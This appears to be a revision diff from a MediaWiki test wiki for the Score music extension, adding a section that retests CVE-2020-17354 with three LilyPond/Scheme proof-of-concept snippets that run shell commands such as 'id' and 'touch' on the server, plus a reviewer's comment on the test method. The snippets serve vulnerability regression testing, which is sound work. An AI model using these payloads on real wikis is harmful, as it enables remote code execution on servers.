Tim paste: Difference between revisions

From ZMOG test wiki (master branch)
No edit summary
 
(3 intermediate revisions by the same user not shown)
Line 53: Line 53:
C,  D, E, F,|G, A, B, C|D E F G|A B c d|
C,  D, E, F,|G, A, B, C|D E F G|A B c d|
e f g a|b c' d' e'|f' g' a' b'|]
e f g a|b c' d' e'|f' g' a' b'|]
</score>
== CVE-2020-17354 ==
See [https://phabricator.wikimedia.org/T259210 T259210]; unable to reproduce with LilyPond 2.23.82, MediaWiki REL1_39, Score on master.
1. PoC from task:<score>
{
  \relative { c' }
}
#(begin
  (define location 1)
  (display "With output-def-scope\n")
  (eval '(system "id") (ly:output-def-scope #{ \midi {} #}))
  (display "With output-def-lookup\n")
  ((ly:output-def-lookup #{ \midi {} #} 'system) "touch /var/www/mediawiki-test/images/lilypond/test-1")
)
</score>
2. Again, using raw=1:<score raw=1>
\header { tagline = ##f } {
  \relative { c' }
}
#(begin
  (define location 1)
  (display "With output-def-scope\n")
  (eval '(system "id") (ly:output-def-scope #{ \midi {} #}))
  (display "With output-def-lookup\n")
  ((ly:output-def-lookup #{ \midi {} #} 'system) "touch /var/www/mediawiki-test/images/lilypond/test-2")
)
</score>
3. Notehead stencil hack PoC, contributed in [https://phabricator.wikimedia.org/T259210#6368852 comment] from LilyPond developer Han-wen Nienhuys: <score>
{
  \override NoteHead.text = \system
  \override NoteHead.stencil =
  #(lambda (grob)
    ((cdr (assoc 'text
  (cadr (ly:grob-alist-chain grob '())))) "touch /var/www/mediawiki-test/images/lilypond/test-3")
    #f)
  c4
}
</score>
</score>
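Review bot: the "unable to reproduce" line at the top of the added CVE-2020-17354 section lists the versions tested but not what was checked. All three PoCs signal success only by creating test-1, test-2 and test-3 under /var/www/mediawiki-test/images/lilypond/, and the `(system "id")` output in PoCs 1 and 2 is not shown on the rendered page. Suggest recording that those three files were absent after rendering and that the directory was writable by the process running LilyPond, so a negative result can be told apart from a failed write or from LilyPond not running at all.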

Latest revision as of 11:15, 21 January 2023

Normal

Unable to obtain LilyPond version:

/bin/bash: line 1: /usr/local/bin/lilypond: No such file or directory

Multipage

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

Raw

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

Starling

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

Rest

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

ABC

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

CVE-2020-17354

See T259210; unable to reproduce with LilyPond 2.23.82, MediaWiki REL1_39, Score on master.

1. PoC from task:

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

2. Again, using raw=1:

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.

3. Notehead stencil hack PoC, contributed in comment from LilyPond developer Han-wen Nienhuys:

Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond is set correctly.